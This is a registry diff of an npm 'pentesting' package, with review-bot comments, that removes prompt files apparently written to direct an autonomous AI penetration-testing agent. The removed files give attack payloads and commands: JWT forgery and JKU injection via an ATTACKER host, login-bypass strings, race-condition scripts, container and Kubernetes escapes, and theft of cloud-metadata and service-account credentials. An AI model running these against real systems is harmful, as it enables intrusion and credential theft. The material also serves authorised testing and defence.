pentesting 0.73.14 → 0.90.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +120 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
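Review bot: package/scripts/postinstall.mjs (+30) and package/scripts/preflight-local.sh (+24) are new in this range, and the listing does not show whether the package.json change (+17 -46) wires the former to the postinstall lifecycle script. If it does, the script runs on every install, so what it touches on disk and on the network should be reviewed and described in the README before anyone upgrades from 0.73.14. The listing also shows the entire dist/ tree removed in favour of bin/pentesting.mjs (+32) and lib/runtime.mjs (+419); the release notes should state where the bundled code and prompt files went.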
|
@@ -1,256 +0,0 @@
|
|
|
1
|
-
# Authentication & Access Control Attacks — Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow the attack tree linearly. Use `get_owasp_knowledge`, `web_search`, and observed
|
|
5
|
-
> target behavior to decide what to test and in what order. Adapt to the target — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: web.md, injection.md, post.md (privesc)
|
|
8
|
-
|
|
9
|
-
## Attack Categories
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
AUTH/ACCESS ATTACK MAP:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Authentication Bypass
|
|
15
|
-
│ ├── Default credentials → web_search("{service} default credentials")
|
|
16
|
-
│ ├── SQL injection in login: admin'-- , ' OR 1=1--, admin'/*
|
|
17
|
-
│ ├── NoSQL injection: {"username":{"$gt":""},"password":{"$gt":""}}
|
|
18
|
-
│ ├── Mass assignment: register with admin=true, role=admin, isAdmin=1
|
|
19
|
-
│ ├── Response manipulation: change HTTP response (401→200, "false"→"true")
|
|
20
|
-
│ ├── Password reset flaws:
|
|
21
|
-
│ │ ├── Predictable token, token reuse, no expiry
|
|
22
|
-
│ │ ├── Host header injection in reset link
|
|
23
|
-
│ │ ├── IDOR in reset endpoint (reset anyone's password)
|
|
24
|
-
│ │ └── Race condition: use token before invalidation
|
|
25
|
-
│ ├── MFA bypass:
|
|
26
|
-
│ │ ├── Skip to post-MFA endpoint directly
|
|
27
|
-
│ │ ├── Brute force OTP (4-6 digit = limited keyspace)
|
|
28
|
-
│ │ ├── Response manipulation (change status code)
|
|
29
|
-
│ │ ├── Backup codes brute force, default backup codes
|
|
30
|
-
│ │ └── web_search("MFA bypass techniques {year}")
|
|
31
|
-
│ ├── Remember me / persistent login:
|
|
32
|
-
│ │ ├── Predictable cookie value → forge for other users
|
|
33
|
-
│ │ ├── Insufficient entropy in token
|
|
34
|
-
│ │ └── Token not bound to IP/user-agent
|
|
35
|
-
│ └── web_search("authentication bypass techniques hacktricks")
|
|
36
|
-
│
|
|
37
|
-
├── 2. Session Attacks
|
|
38
|
-
│ ├── Session fixation: force known session ID
|
|
39
|
-
│ ├── Session hijacking: steal via XSS, network sniffing
|
|
40
|
-
│ ├── Session prediction: analyze session ID patterns → predict next
|
|
41
|
-
│ ├── Insufficient session expiry: reuse old sessions
|
|
42
|
-
│ ├── Cookie manipulation: change cookie values (user ID, role)
|
|
43
|
-
│ ├── Session puzzling: same session variable used differently
|
|
44
|
-
│ └── web_search("session attack techniques OWASP")
|
|
45
|
-
│
|
|
46
|
-
├── 3. JWT Attacks
|
|
47
|
-
│ ├── [RECON] Decode token first (never inspect raw):
|
|
48
|
-
│ │ └── python3 -c "import base64,sys,json; p=sys.argv[1].split('.'); print(json.dumps(json.loads(base64.b64decode(p[0]+'==').decode()),indent=2)); print(json.dumps(json.loads(base64.b64decode(p[1]+'==').decode()),indent=2))" <JWT>
|
|
49
|
-
│ │
|
|
50
|
-
│ ├── A. Algorithm confusion: RS256 → HS256 (sign with public key)
|
|
51
|
-
│ │ ├── Get public key from /jwks.json, /.well-known/openid-configuration, or /api/v1/certs
|
|
52
|
-
│ │ ├── Convert PEM to appropriate form and use as HMAC secret:
|
|
53
|
-
│ │ │ python3 -c "
|
|
54
|
-
│ │ │ import jwt, base64
|
|
55
|
-
│ │ │ pub = open('public.pem').read()
|
|
56
|
-
│ │ │ payload = {'sub':'admin','role':'admin','iat':9999999999}
|
|
57
|
-
│ │ │ token = jwt.encode(payload, pub, algorithm='HS256')
|
|
58
|
-
│ │ │ print(token)"
|
|
59
|
-
│ │ └── Send forged token, check if RS256 check is bypassed
|
|
60
|
-
│ │
|
|
61
|
-
│ ├── B. None algorithm: remove signature entirely
|
|
62
|
-
│ │ ├── Modify header: {"alg":"none","typ":"JWT"} → base64url encode
|
|
63
|
-
│ │ ├── Modify payload: change sub/role/admin claims
|
|
64
|
-
│ │ ├── Set signature to empty: header.payload. (trailing dot, no sig)
|
|
65
|
-
│ │ └── Try variations: "None", "NONE", "nOnE" (case sensitivity bypass)
|
|
66
|
-
│ │
|
|
67
|
-
│ ├── C. JWK/JKU injection: host your own signing key
|
|
68
|
-
│ │ ├── Generate RSA key pair: openssl genrsa -out attacker.pem 2048
|
|
69
|
-
│ │ ├── Start HTTP server: python3 -m http.server 8888
|
|
70
|
-
│ │ ├── Option 1 JKU: add "jku":"http://ATTACKER/jwks.json" to header
|
|
71
|
-
│ │ ├── Option 2 JWK: embed public key directly in "jwk" header param
|
|
72
|
-
│ │ ├── Sign token with your private key, server fetches & trusts your key
|
|
73
|
-
│ │ └── Tool: python3 -m jwt_tool <JWT> -X s -ju http://ATTACKER/jwks.json
|
|
74
|
-
│ │
|
|
75
|
-
│ ├── D. Kid (Key ID) attacks
|
|
76
|
-
│ │ ├── Path traversal: {"kid":"../../../../dev/null"} → HMAC secret = ""
|
|
77
|
-
│ │ │ Sign with empty string: python3 -c "import jwt; print(jwt.encode({'sub':'admin'}, '', algorithm='HS256'))"
|
|
78
|
-
│ │ ├── kid = "../../dev/null" → empty key → predictable signature
|
|
79
|
-
│ │ ├── SQL injection in kid: {"kid":"' UNION SELECT 'secret'--"}
|
|
80
|
-
│ │ │ → DB returns controlled value as secret → sign with that value
|
|
81
|
-
│ │ └── kid = file path to known content: /proc/sys/kernel/hostname
|
|
82
|
-
│ │
|
|
83
|
-
│ ├── E. Secret brute force
|
|
84
|
-
│ │ ├── hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
|
|
85
|
-
│ │ └── john --format=HMAC-SHA256 --wordlist=rockyou.txt jwt.txt
|
|
86
|
-
│ │
|
|
87
|
-
│ ├── F. Claim manipulation (without verifying sig)
|
|
88
|
-
│ │ ├── Change: sub, user_id, role, admin, email, exp (set far future)
|
|
89
|
-
│ │ └── Tool: python3 -m jwt_tool <JWT> -I -pc role -pv admin
|
|
90
|
-
│ │
|
|
91
|
-
│ └── web_search("JWT attack techniques portswigger {year}")
|
|
92
|
-
│ web_search("jwt_tool cheatsheet")
|
|
93
|
-
│
|
|
94
|
-
├── 4. OAuth/OpenID Connect Attacks
|
|
95
|
-
│ ├── [RECON] Map the flow first:
|
|
96
|
-
│ │ ├── Find: /authorize, /token, /userinfo, /.well-known/openid-configuration
|
|
97
|
-
│ │ ├── Note: response_type (code/token), grant_type, client_id, redirect_uri
|
|
98
|
-
│ │ └── Check: state parameter present? PKCE used?
|
|
99
|
-
│ │
|
|
100
|
-
│ ├── A. Redirect URI manipulation → token theft
|
|
101
|
-
│ │ ├── Add path: ?redirect_uri=https://legit.com/callback/../attacker.com
|
|
102
|
-
│ │ ├── Add param: ?redirect_uri=https://legit.com?x=attacker.com
|
|
103
|
-
│ │ ├── Open redirect chain: legit redirect → open redirect → attacker
|
|
104
|
-
│ │ └── Referrer leak: navigate from token URL to external resource
|
|
105
|
-
│ │
|
|
106
|
-
│ ├── B. State parameter CSRF (missing or predictable state)
|
|
107
|
-
│ │ ├── If state absent: craft malicious authorization URL → victim clicks
|
|
108
|
-
│ │ ├── If state predictable: generate valid state, pre-authorize
|
|
109
|
-
│ │ └── Result: bind victim's OAuth to attacker account
|
|
110
|
-
│ │
|
|
111
|
-
│ ├── C. Authorization code interception
|
|
112
|
-
│ │ ├── Code in URL → appears in Referer header to third-party resources
|
|
113
|
-
│ │ ├── Code in logs → check open log endpoints
|
|
114
|
-
│ │ └── Replay: codes often single-use but check if reusable
|
|
115
|
-
│ │
|
|
116
|
-
│ ├── D. PKCE bypass (Proof Key for Code Exchange)
|
|
117
|
-
│ │ ├── Check if code_challenge validation is enforced
|
|
118
|
-
│ │ ├── Try omitting code_verifier → if server accepts → PKCE not enforced
|
|
119
|
-
│ │ └── Downgrade: try response_type=token (implicit) instead of code
|
|
120
|
-
│ │
|
|
121
|
-
│ ├── E. Scope escalation
|
|
122
|
-
│ │ ├── Add scopes: openid profile email admin offline_access
|
|
123
|
-
│ │ └── Check if server returns broader access than requested
|
|
124
|
-
│ │
|
|
125
|
-
│ ├── F. Implicit flow token leakage (older pattern, still found)
|
|
126
|
-
│ │ ├── Token in URL fragment → appears in browser history, Referer
|
|
127
|
-
│ │ └── Single-page apps may log token to console/error handlers
|
|
128
|
-
│ │
|
|
129
|
-
│ ├── G. SSRF via OAuth
|
|
130
|
-
│ │ ├── authorization URL → internal service scan
|
|
131
|
-
│ │ └── request_uri in PAR (Pushed Authorization Requests)
|
|
132
|
-
│ │
|
|
133
|
-
│ └── web_search("OAuth security vulnerabilities exploitation portswigger")
|
|
134
|
-
│ web_search("OAuth 2.0 attack techniques {year}")
|
|
135
|
-
│
|
|
136
|
-
├── 5. IDOR (Insecure Direct Object Reference)
|
|
137
|
-
│ ├── Parameter manipulation: /api/user/123 → /api/user/124
|
|
138
|
-
│ ├── In: URL, POST body, JSON, cookies, headers, file names
|
|
139
|
-
│ ├── Encoded IDs: base64 decode → modify → re-encode
|
|
140
|
-
│ ├── UUID/GUID: not always random (predictable in some implementations)
|
|
141
|
-
│ ├── Sequential testing: iterate through IDs systematically
|
|
142
|
-
│ ├── HTTP method change: GET blocked → POST, PUT, PATCH, DELETE
|
|
143
|
-
│ └── Affects: view/edit/delete other users' data, access admin functions
|
|
144
|
-
│
|
|
145
|
-
├── 6. Access Control Bypass
|
|
146
|
-
│ ├── Horizontal: access other users' resources (same privilege level)
|
|
147
|
-
│ ├── Vertical: access admin/higher-privilege resources
|
|
148
|
-
│ ├── Method-based: POST blocked → GET, PUT, PATCH, OPTIONS
|
|
149
|
-
│ ├── Path-based: /admin/ blocked → /ADMIN/, /Admin, /./admin/, //admin
|
|
150
|
-
│ ├── Header-based: X-Original-URL, X-Rewrite-URL, X-Forwarded-For
|
|
151
|
-
│ ├── Referer-based: add expected Referer header
|
|
152
|
-
│ ├── IP-based: add X-Forwarded-For: 127.0.0.1
|
|
153
|
-
│ ├── API versioning: /api/v1/admin blocked → /api/v2/admin, /api/internal/
|
|
154
|
-
│ ├── Parameter pollution: duplicate parameters with different values
|
|
155
|
-
│ └── web_search("access control bypass techniques hacktricks")
|
|
156
|
-
│
|
|
157
|
-
├── 7. Rate Limiting Bypass
|
|
158
|
-
│ ├── IP rotation headers: X-Forwarded-For, X-Real-IP, X-Originating-IP
|
|
159
|
-
│ ├── Different endpoints: /login vs /LOGIN vs /Login
|
|
160
|
-
│ ├── Parameter pollution: add dummy parameters
|
|
161
|
-
│ ├── Different HTTP methods: POST → PUT
|
|
162
|
-
│ ├── Unicode variations: admin vs admın (dotless i)
|
|
163
|
-
│ ├── Distributed: multiple source IPs
|
|
164
|
-
│ └── Timing: slow down just below rate limit threshold
|
|
165
|
-
│
|
|
166
|
-
└── 8. Business Logic Flaws & Race Conditions
|
|
167
|
-
├── Price manipulation: negative quantities, decimal exploitation
|
|
168
|
-
├── Workflow bypass: skip steps (order→pay→confirm → order→confirm)
|
|
169
|
-
├── Type juggling: PHP == vs === (0 == "string" → true)
|
|
170
|
-
├── Integer overflow: very large numbers → wrap to negative/zero
|
|
171
|
-
├── Referral/reward abuse: self-referral, race condition on signup
|
|
172
|
-
│
|
|
173
|
-
└── Race Conditions (Limit-Override / TOCTOU):
|
|
174
|
-
├── [DETECTION] Does action have a check → use window?
|
|
175
|
-
│ └── Examples: balance check, coupon validity, token invalidation
|
|
176
|
-
│
|
|
177
|
-
├── [EXPLOIT A] Parallel HTTP requests (asyncio — write file, run it)
|
|
178
|
-
│ write_file path=".pentesting/workspace/race.py" content="""
|
|
179
|
-
│ import asyncio, aiohttp, sys
|
|
180
|
-
│
|
|
181
|
-
│ URL = sys.argv[1] if len(sys.argv)>1 else 'http://TARGET/endpoint'
|
|
182
|
-
│ DATA = {'coupon': 'SAVE50', 'amount': '100'}
|
|
183
|
-
│ PARALLEL = 50
|
|
184
|
-
│
|
|
185
|
-
│ async def race():
|
|
186
|
-
│ async with aiohttp.ClientSession() as s:
|
|
187
|
-
│ tasks = [s.post(URL, data=DATA) for _ in range(PARALLEL)]
|
|
188
|
-
│ results = await asyncio.gather(*tasks, return_exceptions=True)
|
|
189
|
-
│ for i, r in enumerate(results):
|
|
190
|
-
│ if hasattr(r,'status'):
|
|
191
|
-
│ text = await r.text()
|
|
192
|
-
│ print(f'[{i}] {r.status}: {text[:100]}')
|
|
193
|
-
│ asyncio.run(race())
|
|
194
|
-
│ """
|
|
195
|
-
│ Then: run_cmd "python3 .pentesting/workspace/race.py http://TARGET/redeem"
|
|
196
|
-
│
|
|
197
|
-
├── [EXPLOIT B] curl parallel (no Python needed)
|
|
198
|
-
│ run_cmd "seq 50 | xargs -P50 -I{} curl -s -X POST http://TARGET/redeem -d 'coupon=SAVE50'"
|
|
199
|
-
│
|
|
200
|
-
├── [EXPLOIT C] TOCTOU symlink race (file operations)
|
|
201
|
-
│ ├── Monitor: inotifywait -m /tmp/uploads -e create
|
|
202
|
-
│ ├── Race: while true; do ln -sf /etc/passwd /tmp/target; done
|
|
203
|
-
│ └── Trigger upload simultaneously
|
|
204
|
-
│
|
|
205
|
-
├── [SUCCESS SIGNAL] One request returns 200, others return 409/error
|
|
206
|
-
│ └── If all return 200 → not fixed, try extracting duplicate benefit
|
|
207
|
-
│
|
|
208
|
-
└── web_search("race condition portswigger limit override")
|
|
209
|
-
web_search("TOCTOU exploit {context} {year}")
|
|
210
|
-
```
|
|
211
|
-
|
|
212
|
-
## JWT Decision Tree
|
|
213
|
-
```
|
|
214
|
-
Intercept JWT →
|
|
215
|
-
├── Decode header → check "alg" field
|
|
216
|
-
│ ├── "RS256"/"ES256" → try A (HS256 confusion) + C (JWK inject)
|
|
217
|
-
│ ├── "HS256" → try E (brute force) + D (kid attacks)
|
|
218
|
-
│ └── "none" → already vulnerable, forge freely
|
|
219
|
-
├── Check "kid" field present? → try D (path traversal + SQLi)
|
|
220
|
-
├── Check "jku"/"jwk" field? → try C (inject your own key)
|
|
221
|
-
└── No strong alg? → try B (none algorithm)
|
|
222
|
-
```
|
|
223
|
-
|
|
224
|
-
## Session & Token Extraction (save_session workflow)
|
|
225
|
-
```
|
|
226
|
-
After browse_url or fill_form with save_session: true, TWO files are saved:
|
|
227
|
-
|
|
228
|
-
.pentesting/workspace/browser-session.json → Playwright state (use_session)
|
|
229
|
-
.pentesting/workspace/auth-headers.json → Extracted headers for ANY tool
|
|
230
|
-
|
|
231
|
-
auth-headers.json example:
|
|
232
|
-
{ "Authorization": "Bearer eyJ0eXAiOiJKV1Q...", "Cookie": "session=abc123" }
|
|
233
|
-
|
|
234
|
-
Reuse in run_cmd:
|
|
235
|
-
AUTH=.pentesting/workspace/auth-headers.json
|
|
236
|
-
TOKEN=$(jq -r .Authorization $AUTH)
|
|
237
|
-
COOKIE=$(jq -r '.["Cookie"]' $AUTH)
|
|
238
|
-
|
|
239
|
-
curl -s -H "Authorization: $TOKEN" -H "Cookie: $COOKIE" http://TARGET/api/admin
|
|
240
|
-
sqlmap -u "http://TARGET/api/data?id=1" --headers="Authorization: $TOKEN" --dbs
|
|
241
|
-
python3 -c "import json,requests; h=json.load(open('$AUTH')); print(requests.get('http://TARGET/api/me',headers=h).text)"
|
|
242
|
-
|
|
243
|
-
If Authorization key is missing (session-only app):
|
|
244
|
-
curl -b "$COOKIE" http://TARGET/admin
|
|
245
|
-
```
|
|
246
|
-
|
|
247
|
-
## Search Patterns
|
|
248
|
-
```
|
|
249
|
-
web_search("{auth_mechanism} bypass techniques")
|
|
250
|
-
web_search("broken access control exploitation hacktricks")
|
|
251
|
-
web_search("IDOR exploitation techniques {year}")
|
|
252
|
-
web_search("{technology} authentication vulnerability")
|
|
253
|
-
web_search("PayloadsAllTheThings {attack_type}")
|
|
254
|
-
web_search("jwt_tool usage portswigger")
|
|
255
|
-
web_search("OAuth 2.0 vulnerability {grant_type} exploitation")
|
|
256
|
-
```
|
|
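Review bot: Missing documentation for the session files described at lines 224-245 of the removed file. Those lines are the only place in this hunk that documents `.pentesting/workspace/browser-session.json` and `.pentesting/workspace/auth-headers.json`, and the example at line 232 shows the latter holding a bearer token and a session cookie as plain JSON. With the file deleted and no replacement visible, users cannot tell whether 0.90.1 still writes these files. Suggest a README or changelog entry that says so and tells users of 0.73.14 to delete leftover workspace files, since they hold credentials for the application under test. The hunk carries no file header; the 256-line count matches package/dist/prompts/techniques/auth-access.md in the file list, so name the file in the changelog as well.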
@@ -1,103 +0,0 @@
|
|
|
1
|
-
# Container Escape & Cloud Attack Techniques
|
|
2
|
-
|
|
3
|
-
## Docker Container Detection
|
|
4
|
-
```
|
|
5
|
-
Am I in a container?
|
|
6
|
-
├── cat /proc/1/cgroup → contains "docker" or container ID?
|
|
7
|
-
├── ls /.dockerenv → exists = Docker container
|
|
8
|
-
├── hostname → random hex string = likely container
|
|
9
|
-
├── mount | grep overlay → overlay filesystem = container
|
|
10
|
-
├── cat /proc/self/status | grep CapEff → limited capabilities?
|
|
11
|
-
└── env | grep -i docker → Docker-related env vars?
|
|
12
|
-
```
|
|
13
|
-
|
|
14
|
-
## Docker Escape Techniques
|
|
15
|
-
```
|
|
16
|
-
1. Privileged container (--privileged):
|
|
17
|
-
├── Full device access → mount host filesystem
|
|
18
|
-
│ mkdir /mnt/host && mount /dev/sda1 /mnt/host
|
|
19
|
-
│ cat /mnt/host/root/root.txt
|
|
20
|
-
├── nsenter: nsenter --target 1 --mount --uts --ipc --net --pid
|
|
21
|
-
└── Load kernel module: insmod backdoor.ko
|
|
22
|
-
|
|
23
|
-
2. Docker socket mounted (-v /var/run/docker.sock):
|
|
24
|
-
├── docker -H unix:///var/run/docker.sock ps
|
|
25
|
-
├── Create privileged container:
|
|
26
|
-
│ docker run -it --privileged --pid=host -v /:/host ubuntu chroot /host
|
|
27
|
-
└── Access host filesystem through new container
|
|
28
|
-
|
|
29
|
-
3. Dangerous capabilities:
|
|
30
|
-
├── CAP_SYS_ADMIN → mount host devices, use nsenter
|
|
31
|
-
├── CAP_SYS_PTRACE → process injection, debug host processes
|
|
32
|
-
├── CAP_NET_ADMIN → ARP spoof, network manipulation
|
|
33
|
-
├── CAP_DAC_READ_SEARCH → read any file
|
|
34
|
-
└── Check: capsh --print | grep Current
|
|
35
|
-
|
|
36
|
-
4. Writable host paths:
|
|
37
|
-
├── If anything is mounted from host (-v /hostpath:/container):
|
|
38
|
-
│ Write to that path to affect host
|
|
39
|
-
├── Common: /var/log, /tmp, /opt, config directories
|
|
40
|
-
└── Write crontab/SSH key to mounted host path
|
|
41
|
-
|
|
42
|
-
5. Kernel exploits:
|
|
43
|
-
├── Container shares kernel with host
|
|
44
|
-
├── uname -r → search for kernel CVEs
|
|
45
|
-
├── CVE-2022-0847 (DirtyPipe)
|
|
46
|
-
├── CVE-2022-0185 (fsconfig heap overflow)
|
|
47
|
-
└── CVE-2024-21626 (runc breakout via /proc/self/fd)
|
|
48
|
-
|
|
49
|
-
6. Docker API (2375/2376):
|
|
50
|
-
├── Unauthenticated Docker API = instant host compromise
|
|
51
|
-
├── docker -H tcp://<target>:2375 ps
|
|
52
|
-
└── Create privileged container mounting host /
|
|
53
|
-
```
|
|
54
|
-
|
|
55
|
-
## Kubernetes Escape
|
|
56
|
-
```
|
|
57
|
-
1. Service account token:
|
|
58
|
-
├── cat /var/run/secrets/kubernetes.io/serviceaccount/token
|
|
59
|
-
├── Use token to query API: curl -sk https://kubernetes.default.svc/api/v1/
|
|
60
|
-
├── Enumerate permissions: kubectl auth can-i --list
|
|
61
|
-
└── If can create pods → privileged pod escape
|
|
62
|
-
|
|
63
|
-
2. Privileged pod:
|
|
64
|
-
├── Create pod with hostPID, hostNetwork, privileged: true
|
|
65
|
-
├── Mount host filesystem: volumeMounts hostPath /
|
|
66
|
-
└── nsenter --target 1 --mount --uts --ipc --net --pid bash
|
|
67
|
-
|
|
68
|
-
3. etcd access:
|
|
69
|
-
├── etcd often unauthenticated on port 2379
|
|
70
|
-
├── Contains ALL K8s secrets: etcdctl get --prefix /registry/secrets
|
|
71
|
-
└── Includes service account tokens, DB passwords, etc.
|
|
72
|
-
|
|
73
|
-
4. Common K8s misconfigs:
|
|
74
|
-
├── Dashboard without auth (port 8443/30000)
|
|
75
|
-
├── Tiller (Helm v2) without auth → arbitrary K8s operations
|
|
76
|
-
├── Kubelet API (10250) without auth → exec into any pod
|
|
77
|
-
│ curl -sk https://<node>:10250/pods
|
|
78
|
-
│ curl -sk https://<node>:10250/exec/<ns>/<pod>/<container> -d "cmd=id"
|
|
79
|
-
└── RBAC misconfiguration → escalate to cluster-admin
|
|
80
|
-
```
|
|
81
|
-
|
|
82
|
-
## Cloud Metadata
|
|
83
|
-
```
|
|
84
|
-
Cloud metadata endpoints (SSRF targets):
|
|
85
|
-
├── AWS: http://169.254.169.254/latest/meta-data/
|
|
86
|
-
│ ├── /iam/security-credentials/ → IAM role credentials
|
|
87
|
-
│ ├── /user-data → startup scripts (often contain secrets)
|
|
88
|
-
│ └── IMDSv2: TOKEN=$(curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
|
|
89
|
-
│ curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
|
|
90
|
-
├── GCP: http://metadata.google.internal/computeMetadata/v1/
|
|
91
|
-
│ └── Requires header: Metadata-Flavor: Google
|
|
92
|
-
├── Azure: http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
|
93
|
-
│ └── Requires header: Metadata: true
|
|
94
|
-
└── DigitalOcean: http://169.254.169.254/metadata/v1/
|
|
95
|
-
|
|
96
|
-
Post-exploitation with cloud creds:
|
|
97
|
-
├── AWS: Configure aws cli → enumerate IAM, S3, Lambda, EC2
|
|
98
|
-
│ aws sts get-caller-identity
|
|
99
|
-
│ aws s3 ls
|
|
100
|
-
│ aws iam list-users
|
|
101
|
-
├── GCP: gcloud auth activate-service-account → enumerate
|
|
102
|
-
└── Azure: az login → enumerate resources
|
|
103
|
-
```
|
|
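Review bot: No file header or deprecation pointer accompanies this 103-line removal. The count matches package/dist/prompts/techniques/container-escape.md in the file list, and nothing visible here shows whether the added lib/runtime.mjs still resolves prompt files by path. Confirm that no loader references dist/prompts/techniques/ after this change, otherwise the tool will fail at runtime on a missing file, and record in the changelog whether this content was dropped or relocated.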
@@ -1,296 +0,0 @@
|
|
|
1
|
-
# Cryptography Attack Techniques
|
|
2
|
-
|
|
3
|
-
## Hash Cracking
|
|
4
|
-
```
|
|
5
|
-
Identify hash type:
|
|
6
|
-
├── hashid <hash> OR hash-identifier
|
|
7
|
-
├── Online: hashes.com, crackstation.net
|
|
8
|
-
└── hashcat --example-hashes | grep -B1 <hash_start>
|
|
9
|
-
|
|
10
|
-
Crack with hashcat:
|
|
11
|
-
├── MD5: hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
|
|
12
|
-
├── SHA1: hashcat -m 100 hash.txt rockyou.txt
|
|
13
|
-
├── SHA256: hashcat -m 1400 hash.txt rockyou.txt
|
|
14
|
-
├── bcrypt: hashcat -m 3200 hash.txt rockyou.txt
|
|
15
|
-
├── NTLM: hashcat -m 1000 hash.txt rockyou.txt
|
|
16
|
-
├── Kerberos TGS: hashcat -m 13100 hash.txt rockyou.txt
|
|
17
|
-
├── NetNTLMv2: hashcat -m 5600 hash.txt rockyou.txt
|
|
18
|
-
└── With rules: hashcat -m 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
19
|
-
|
|
20
|
-
John the Ripper:
|
|
21
|
-
├── john --wordlist=rockyou.txt hash.txt
|
|
22
|
-
├── john --show hash.txt
|
|
23
|
-
└── john --rules=All hash.txt
|
|
24
|
-
```
|
|
25
|
-
|
|
26
|
-
## RSA Attacks
|
|
27
|
-
```
|
|
28
|
-
When you find RSA parameters (n, e, c, p, q):
|
|
29
|
-
|
|
30
|
-
Small n → factor with:
|
|
31
|
-
├── factordb.com (online)
|
|
32
|
-
├── RsaCtfTool: python3 RsaCtfTool.py -n <n> -e <e> --uncipher <c>
|
|
33
|
-
└── yafu: yafu "factor(n)"
|
|
34
|
-
|
|
35
|
-
Common RSA weaknesses:
|
|
36
|
-
├── Small e (e=3) → cube root attack
|
|
37
|
-
├── Common modulus → shared p or q between keys
|
|
38
|
-
├── Wiener's attack → small d (large e)
|
|
39
|
-
├── Hastad's broadcast → same m encrypted with different n, same small e
|
|
40
|
-
├── Bleichenbacher → padding oracle on PKCS#1 v1.5
|
|
41
|
-
├── Fermat factoring → p and q close together
|
|
42
|
-
└── Twin prime → p = q ± 2
|
|
43
|
-
|
|
44
|
-
Python template:
|
|
45
|
-
from Crypto.Util.number import *
|
|
46
|
-
n, e, c = ...
|
|
47
|
-
# After finding p, q:
|
|
48
|
-
phi = (p-1)*(q-1)
|
|
49
|
-
d = inverse(e, phi)
|
|
50
|
-
m = pow(c, d, n)
|
|
51
|
-
print(long_to_bytes(m))
|
|
52
|
-
```
|
|
53
|
-
|
|
54
|
-
## Classical Ciphers
|
|
55
|
-
```
|
|
56
|
-
Common in CTF misc/crypto:
|
|
57
|
-
├── Caesar/ROT13: Try all 26 shifts → dcode.fr/caesar-cipher
|
|
58
|
-
├── Vigenère: Key analysis → dcode.fr/vigenere-cipher
|
|
59
|
-
├── XOR: Single-byte XOR brute → CyberChef XOR Brute Force
|
|
60
|
-
├── Substitution: Frequency analysis → quipqiup.com
|
|
61
|
-
├── Base encodings:
|
|
62
|
-
│ ├── Base64: = padding, A-Za-z0-9+/
|
|
63
|
-
│ ├── Base32: = padding, A-Z2-7
|
|
64
|
-
│ └── Base85/ASCII85: ~> delimiter
|
|
65
|
-
├── Hex: 0-9a-f only → xxd -r -p
|
|
66
|
-
└── Morse/Braille/Semaphore: visual pattern recognition
|
|
67
|
-
```
|
|
68
|
-
|
|
69
|
-
## Padding Oracle Attack
|
|
70
|
-
```
|
|
71
|
-
